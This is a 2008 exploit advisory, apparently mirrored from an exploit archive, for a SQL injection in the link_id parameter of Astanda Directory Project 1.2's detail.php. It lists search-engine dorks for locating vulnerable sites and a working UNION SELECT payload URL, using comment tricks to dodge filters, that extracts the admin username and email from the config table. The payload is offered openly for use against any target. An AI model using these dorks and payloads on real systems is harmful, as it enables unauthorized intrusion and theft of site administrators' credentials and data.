[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Astanda Directory Project 1.2 (link_id) SQL Injection Vulnerability
# Published : 2008-02-06
# Author : you_kn0w
# Previous Title : MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit
# Next Title : Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=#
# ~Author: you_kn0w #
# ~Contact: you-know[at]linuxmail[dot]org #
# ~Website: www.youknowz.info #
# ~Script: Astanda Directory Project #
# ~Bug: APD Remote SQL Injection #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
# Script Information #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
# #
# Script name: Astanda Directory Project #
# Script site: http://www.astanda.com/adp #
# Script demo: http://www.astanda.com/adp/admin#
# Description: Search Engine #
# Version: v.1.2 & v.1.3 #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
# [-]Dorks:
intext: Powered by APD
intext: ?? Copyright 2005, 2006, Astanda.com, Pavel Golovko
inurl:detail.php?link_id=
# [+]How To Exploit:
http://[target].com/[path]/detail.php?link_id=-1/**/union/**/all/**/select/**/1,concat(0x3C68313E557365723A203C2F68313E,admin,0x3C68313E456D61696C3A203C2F68313E,email),null,null,0,0,1,1,1,1,0/**/from/**/config/*
# [+]Greetz:
Greetz to; ka0x - Celciuz - JosS - Phanter-Root & Screamo
//you_kn0w
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# www.Syue.com [2008-02-06]